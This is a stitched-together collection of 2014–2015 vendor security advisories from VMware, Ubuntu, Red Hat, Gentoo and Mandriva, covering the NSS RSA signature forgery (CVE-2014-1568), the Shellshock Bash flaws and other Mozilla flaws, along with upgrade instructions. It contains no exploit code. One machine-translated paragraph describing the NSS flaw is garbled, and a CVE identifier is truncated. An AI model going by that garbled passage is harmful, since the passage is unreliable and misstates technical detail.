vSphere Storage Appliance 5.x Linux Patch Pending ** This product includes Virtual Appliances that will be updated, the product itself is not a Virtual Appliance. Solution vCenter Log Insight ---------------------------- Downloads: https://www.vmware.com/go/download-vcenter-log-insight (click Go to Downloads) Documentation: http://kb.vmware.com/kb/2091065 5. References VMware Knowledge Base Article 2090740 http://kb.vmware.com/kb/2090740 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 , http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187 - ------------------------------------------------------------------------ 6. Change Log 2014-09-30 VMSA-2014-0010 Initial security advisory in conjunction with the release of vCenter Log Insight 2.0 U1 on 2014-09-30. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: security-announce at lists.vmware.com bugtraq at securityfocus.com fulldisclosure at seclists.org E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Advisories http://www.vmware.com/security/advisories VMware Security Response Policy https://www.vmware.com/support/policies/security_response.html VMware Lifecycle Policy https://www.vmware.com/support/policies/lifecycle.html Twitter https://twitter.com/VMwareSRC Copyright 2014 VMware Inc. All rights reserved

Mozilla Network Security Services (NSS) before 3.16.2.1, 3.16.x before 3.16.5, and 3.17.x before 3.17.1, as used in Mozilla Firefox before 32.0.3, Mozilla Firefox ESR 24.x before 24.8.1 and 31.x before 31.1.1, Mozilla Thunderbird before 24.8.1 and 31.x before 31.1.2, Mozilla SeaMonkey before 2.29.1, Google Chrome before 37.0.2062.124 on Windows and OS X, and Google Chrome OS before 37.0.2062.120, does not properly parse ASN.1 values in X.509 certificates, which makes it easier for remote attackers to spoof RSA signatures via a crafted certificate, aka a "signature malleability" issue. This vulnerability may allow an attacker to forge a RSA signature, such as a SSL certificate. Mozilla Network Security Services (NSS) The library contains DigestInfo There is a problem with the processing of RSA A vulnerability exists that does not properly verify signatures. Mozilla Network Security Services (NSS) Implemented by the library DigestInfo There is a vulnerability in the processing of. BER Encoded DigestInfo When parsing a field, the parsing of padded bytes is bypassed, PKCS#1 v1.5 Formal RSA Signature forgery may not be detected (CWE-295) . CWE-295: Improper Certificate Validation http://cwe.mitre.org/data/definitions/295.html This vulnerability 2006 Announced in the year Bleichenbacher vulnerability It is a kind of. Bleichenbacher vulnerability http://www.imc.org/ietf-openpgp/mail-archive/msg06063.html Mozilla NSS Is plural Linux Distributions and packages, and Google Chrome And Google Chrome OS It is used in etc. Other vulnerable libraries and products may have similar vulnerable implementations.SSL Certificate etc. RSA The signature may be forged. ============================================================================ Ubuntu Security Notice USN-2360-2 September 24, 2014 thunderbird vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 14.04 LTS - Ubuntu 12.04 LTS Summary: Fraudulent security certificates could allow sensitive information to be exposed when accessing the Internet. This update provides the corresponding updates for Thunderbird. Original advisory details: Antoine Delignat-Lavaud and others discovered that NSS incorrectly handled parsing ASN.1 values. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 14.04 LTS: thunderbird 1:31.1.2+build1-0ubuntu0.14.04.1 Ubuntu 12.04 LTS: thunderbird 1:31.1.2+build1-0ubuntu0.12.04.1 After a standard system update you need to restart Thunderbird to make all the necessary changes. He discovered that NSS is vulnerable to a variant of a signature forgery attack previously published by Daniel Bleichenbacher. This is due to lenient parsing of ASN.1 values involved in a signature and could lead to the forging of RSA certificates (CVE-2014-1568). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: rhev-hypervisor6 security update Advisory ID: RHSA-2014:1354-01 Product: Red Hat Enterprise Virtualization Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1354.html Issue date: 2014-10-02 CVE Names: CVE-2014-1568 CVE-2014-6271 CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 ===================================================================== 1. Summary: An updated rhev-hypervisor6 package that fixes several security issues is now available. Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: RHEV-M 3.4 - noarch 3. Description: The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: a subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent. Note: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions. A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue. (CVE-2014-6271) It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue. (CVE-2014-7169) A flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One) input from certain RSA signatures. (CVE-2014-1568) It was discovered that the fixed-sized redir_stack could be forced to overflow in the Bash parser, resulting in memory corruption, and possibly leading to arbitrary code execution when evaluating untrusted input that would not otherwise be run as code. (CVE-2014-7186) An off-by-one error was discovered in the way Bash was handling deeply nested flow control constructs. Depending on the layout of the .bss segment, this could allow arbitrary execution of code that would not otherwise be executed by Bash. (CVE-2014-7187) Red Hat would like to thank Stephane Chazelas for reporting CVE-2014-6271, and the Mozilla project for reporting CVE-2014-1568. Upstream acknowledges Antoine Delignat-Lavaud and Intel Product Security Incident Response Team as the original reporters of CVE-2014-1568. The CVE-2014-7186 and CVE-2014-7187 issues were discovered by Florian Weimer of Red Hat Product Security. Users of the Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package. 4. Solution: This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 To upgrade Hypervisors in Red Hat Enterprise Virtualization environments using the disk image provided by this package, refer to: https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/ht ml/Hypervisor_Deployment_Guide/chap-Deployment_Guide-Upgrading_Red_Hat_Ente rprise_Virtualization_Hypervisors.html 5. Bugs fixed (https://bugzilla.redhat.com/): 1141597 - CVE-2014-6271 bash: specially-crafted environment variables can be used to inject shell commands 1145429 - CVE-2014-1568 nss: RSA PKCS#1 signature verification forgery flaw (MFSA 2014-73) 1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271) 1146791 - CVE-2014-7186 bash: parser can allow out-of-bounds memory access while handling redir_stack 1146804 - CVE-2014-7187 bash: off-by-one error in deeply nested flow control constructs 6. Package List: RHEV-M 3.4: Source: rhev-hypervisor6-6.5-20140930.1.el6ev.src.rpm noarch: rhev-hypervisor6-6.5-20140930.1.el6ev.noarch.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-1568.html https://www.redhat.com/security/data/cve/CVE-2014-6271.html https://www.redhat.com/security/data/cve/CVE-2014-7169.html https://www.redhat.com/security/data/cve/CVE-2014-7186.html https://www.redhat.com/security/data/cve/CVE-2014-7187.html https://access.redhat.com/security/updates/classification/#critical 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFULad7XlSAg2UNWIIRArccAJ95pkvG2fyfrI6g4Ve/+fAdnbQq2QCffmYR IH3VLRMcNTi5Gr1GmWlBiFg= =DD5a -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201504-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Mozilla Products: Multiple vulnerabilities Date: April 07, 2015 Bugs: #489796, #491234, #493850, #500320, #505072, #509050, #512896, #517876, #522020, #523652, #525474, #531408, #536564, #541316, #544056 ID: 201504-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Mozilla Firefox, Thunderbird, and SeaMonkey, the worst of which may allow user-assisted execution of arbitrary code. Background ========== Mozilla Firefox is an open-source web browser and Mozilla Thunderbird an open-source email client, both from the Mozilla Project. The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the =E2=80=98Mozilla Application Suite=E2=80=99. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-client/firefox < 31.5.3 >= 31.5.3 2 www-client/firefox-bin < 31.5.3 >= 31.5.3 3 mail-client/thunderbird < 31.5.0 >= 31.5.0 4 mail-client/thunderbird-bin < 31.5.0 >= 31.5.0 5 www-client/seamonkey < 2.33.1 >= 2.33.1 6 www-client/seamonkey-bin < 2.33.1 >= 2.33.1 7 dev-libs/nspr < 4.10.6 >= 4.10.6 ------------------------------------------------------------------- 7 affected packages Description =========== Multiple vulnerabilities have been discovered in Firefox, Thunderbird, and SeaMonkey. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could entice a user to view a specially crafted web page or email, possibly resulting in execution of arbitrary code or a Denial of Service condition. Furthermore, a remote attacker may be able to perform Man-in-the-Middle attacks, obtain sensitive information, spoof the address bar, conduct clickjacking attacks, bypass security restrictions and protection mechanisms, or have other unspecified impact. Workaround ========== There are no known workarounds at this time. Resolution ========== All firefox users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/firefox-31.5.3" All firefox-bin users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-31.5.3" All thunderbird users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-31.5.0"= All thunderbird-bin users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-31.5.0" All seamonkey users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-2.33.1" All seamonkey-bin users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-client/seamonkey-bin-2.33.1" All nspr users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/nspr-4.10.6" References ========== [ 1 ] CVE-2013-1741 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1741 [ 2 ] CVE-2013-2566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2566 [ 3 ] CVE-2013-5590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5590 [ 4 ] CVE-2013-5591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5591 [ 5 ] CVE-2013-5592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5592 [ 6 ] CVE-2013-5593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5593 [ 7 ] CVE-2013-5595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5595 [ 8 ] CVE-2013-5596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5596 [ 9 ] CVE-2013-5597 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5597 [ 10 ] CVE-2013-5598 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5598 [ 11 ] CVE-2013-5599 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5599 [ 12 ] CVE-2013-5600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5600 [ 13 ] CVE-2013-5601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5601 [ 14 ] CVE-2013-5602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5602 [ 15 ] CVE-2013-5603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5603 [ 16 ] CVE-2013-5604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5604 [ 17 ] CVE-2013-5605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5605 [ 18 ] CVE-2013-5606 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5606 [ 19 ] CVE-2013-5607 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5607 [ 20 ] CVE-2013-5609 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5609 [ 21 ] CVE-2013-5610 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5610 [ 22 ] CVE-2013-5612 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5612 [ 23 ] CVE-2013-5613 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5613 [ 24 ] CVE-2013-5614 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5614 [ 25 ] CVE-2013-5615 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5615 [ 26 ] CVE-2013-5616 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5616 [ 27 ] CVE-2013-5618 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5618 [ 28 ] CVE-2013-5619 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5619 [ 29 ] CVE-2013-6671 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6671 [ 30 ] CVE-2013-6672 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6672 [ 31 ] CVE-2013-6673 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6673 [ 32 ] CVE-2014-1477 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1477 [ 33 ] CVE-2014-1478 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1478 [ 34 ] CVE-2014-1479 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1479 [ 35 ] CVE-2014-1480 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1480 [ 36 ] CVE-2014-1481 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1481 [ 37 ] CVE-2014-1482 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1482 [ 38 ] CVE-2014-1483 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1483 [ 39 ] CVE-2014-1485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1485 [ 40 ] CVE-2014-1486 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1486 [ 41 ] CVE-2014-1487 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1487 [ 42 ] CVE-2014-1488 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1488 [ 43 ] CVE-2014-1489 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1489 [ 44 ] CVE-2014-1490 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1490 [ 45 ] CVE-2014-1491 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1491 [ 46 ] CVE-2014-1492 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1492 [ 47 ] CVE-2014-1493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1493 [ 48 ] CVE-2014-1494 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1494 [ 49 ] CVE-2014-1496 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1496 [ 50 ] CVE-2014-1497 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1497 [ 51 ] CVE-2014-1498 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1498 [ 52 ] CVE-2014-1499 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1499 [ 53 ] CVE-2014-1500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1500 [ 54 ] CVE-2014-1502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1502 [ 55 ] CVE-2014-1505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1505 [ 56 ] CVE-2014-1508 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1508 [ 57 ] CVE-2014-1509 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1509 [ 58 ] CVE-2014-1510 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1510 [ 59 ] CVE-2014-1511 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1511 [ 60 ] CVE-2014-1512 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1512 [ 61 ] CVE-2014-1513 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1513 [ 62 ] CVE-2014-1514 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1514 [ 63 ] CVE-2014-1518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1518 [ 64 ] CVE-2014-1519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1519 [ 65 ] CVE-2014-1520 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1520 [ 66 ] CVE-2014-1522 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1522 [ 67 ] CVE-2014-1523 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1523 [ 68 ] CVE-2014-1524 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1524 [ 69 ] CVE-2014-1525 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1525 [ 70 ] CVE-2014-1526 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1526 [ 71 ] CVE-2014-1529 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1529 [ 72 ] CVE-2014-1530 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1530 [ 73 ] CVE-2014-1531 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1531 [ 74 ] CVE-2014-1532 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1532 [ 75 ] CVE-2014-1533 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1533 [ 76 ] CVE-2014-1534 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1534 [ 77 ] CVE-2014-1536 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1536 [ 78 ] CVE-2014-1537 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1537 [ 79 ] CVE-2014-1538 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1538 [ 80 ] CVE-2014-1539 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1539 [ 81 ] CVE-2014-1540 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1540 [ 82 ] CVE-2014-1541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1541 [ 83 ] CVE-2014-1542 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1542 [ 84 ] CVE-2014-1543 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1543 [ 85 ] CVE-2014-1544 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1544 [ 86 ] CVE-2014-1545 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1545 [ 87 ] CVE-2014-1547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1547 [ 88 ] CVE-2014-1548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1548 [ 89 ] CVE-2014-1549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1549 [ 90 ] CVE-2014-1550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1550 [ 91 ] CVE-2014-1551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1551 [ 92 ] CVE-2014-1552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1552 [ 93 ] CVE-2014-1553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1553 [ 94 ] CVE-2014-1554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1554 [ 95 ] CVE-2014-1555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1555 [ 96 ] CVE-2014-1556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1556 [ 97 ] CVE-2014-1557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1557 [ 98 ] CVE-2014-1558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1558 [ 99 ] CVE-2014-1559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1559 [ 100 ] CVE-2014-1560 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1560 [ 101 ] CVE-2014-1561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1561 [ 102 ] CVE-2014-1562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1562 [ 103 ] CVE-2014-1563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1563 [ 104 ] CVE-2014-1564 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1564 [ 105 ] CVE-2014-1565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1565 [ 106 ] CVE-2014-1566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1566 [ 107 ] CVE-2014-1567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1567 [ 108 ] CVE-2014-1568 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1568 [ 109 ] CVE-2014-1574 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1574 [ 110 ] CVE-2014-1575 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1575 [ 111 ] CVE-2014-1576 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1576 [ 112 ] CVE-2014-1577 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1577 [ 113 ] CVE-2014-1578 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1578 [ 114 ] CVE-2014-1580 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1580 [ 115 ] CVE-2014-1581 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1581 [ 116 ] CVE-2014-1582 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1582 [ 117 ] CVE-2014-1583 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1583 [ 118 ] CVE-2014-1584 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1584 [ 119 ] CVE-2014-1585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1585 [ 120 ] CVE-2014-1586 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1586 [ 121 ] CVE-2014-1587 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1587 [ 122 ] CVE-2014-1588 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1588 [ 123 ] CVE-2014-1589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1589 [ 124 ] CVE-2014-1590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1590 [ 125 ] CVE-2014-1591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1591 [ 126 ] CVE-2014-1592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1592 [ 127 ] CVE-2014-1593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1593 [ 128 ] CVE-2014-1594 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1594 [ 129 ] CVE-2014-5369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5369 [ 130 ] CVE-2014-8631 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8631 [ 131 ] CVE-2014-8632 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8632 [ 132 ] CVE-2014-8634 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8634 [ 133 ] CVE-2014-8635 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8635 [ 134 ] CVE-2014-8636 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8636 [ 135 ] CVE-2014-8637 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8637 [ 136 ] CVE-2014-8638 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8638 [ 137 ] CVE-2014-8639 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8639 [ 138 ] CVE-2014-8640 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8640 [ 139 ] CVE-2014-8641 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8641 [ 140 ] CVE-2014-8642 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8642 [ 141 ] CVE-2015-0817 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0817 [ 142 ] CVE-2015-0818 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0818 [ 143 ] CVE-2015-0819 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0819 [ 144 ] CVE-2015-0820 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0820 [ 145 ] CVE-2015-0821 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0821 [ 146 ] CVE-2015-0822 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0822 [ 147 ] CVE-2015-0823 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0823 [ 148 ] CVE-2015-0824 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0824 [ 149 ] CVE-2015-0825 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0825 [ 150 ] CVE-2015-0826 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0826 [ 151 ] CVE-2015-0827 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0827 [ 152 ] CVE-2015-0828 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0828 [ 153 ] CVE-2015-0829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0829 [ 154 ] CVE-2015-0830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0830 [ 155 ] CVE-2015-0831 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0831 [ 156 ] CVE-2015-0832 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0832 [ 157 ] CVE-2015-0833 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0833 [ 158 ] CVE-2015-0834 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0834 [ 159 ] CVE-2015-0835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0835 [ 160 ] CVE-2015-0836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0836 [ 161 ] VE-2014-1504 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201504-01 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2015:059 http://www.mandriva.com/en/support/security/ _______________________________________________________________________ Package : nss Date : March 13, 2015 Affected: Business Server 2.0 _______________________________________________________________________ Problem Description: Multiple vulnerabilities has been found and corrected in the Mozilla NSS and NSPR packages: The cert_TestHostName function in lib/certdb/certdb.c in the certificate-checking implementation in Mozilla Network Security Services (NSS) before 3.16 accepts a wildcard character that is embedded in an internationalized domain name&#039;s U-label, which might allow man-in-the-middle attackers to spoof SSL servers via a crafted certificate (CVE-2014-1492). Use-after-free vulnerability in the CERT_DestroyCertificate function in libnss3.so in Mozilla Network Security Services (NSS) 3.x, as used in Firefox before 31.0, Firefox ESR 24.x before 24.7, and Thunderbird before 24.7, allows remote attackers to execute arbitrary code via vectors that trigger certain improper removal of an NSSCertificate structure from a trust domain (CVE-2014-1544). The definite_length_decoder function in lib/util/quickder.c in Mozilla Network Security Services (NSS) before 3.16.2.4 and 3.17.x before 3.17.3 does not ensure that the DER encoding of an ASN.1 length is properly formed, which allows remote attackers to conduct data-smuggling attacks by using a long byte sequence for an encoding, as demonstrated by the SEC_QuickDERDecodeItem function&#039;s improper handling of an arbitrary-length encoding of 0x00 (CVE-2014-1569). Mozilla Netscape Portable Runtime (NSPR) before 4.10.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds write) via vectors involving the sprintf and console functions (CVE-2014-1545). The sqlite3 packages have been upgraded to the 3.8.6 version due to an prerequisite to nss-3.17.x. Additionally the rootcerts package has also been updated to the latest version as of 2014-11-17, which adds, removes, and distrusts several certificates. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1492 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1544 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1568 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1545 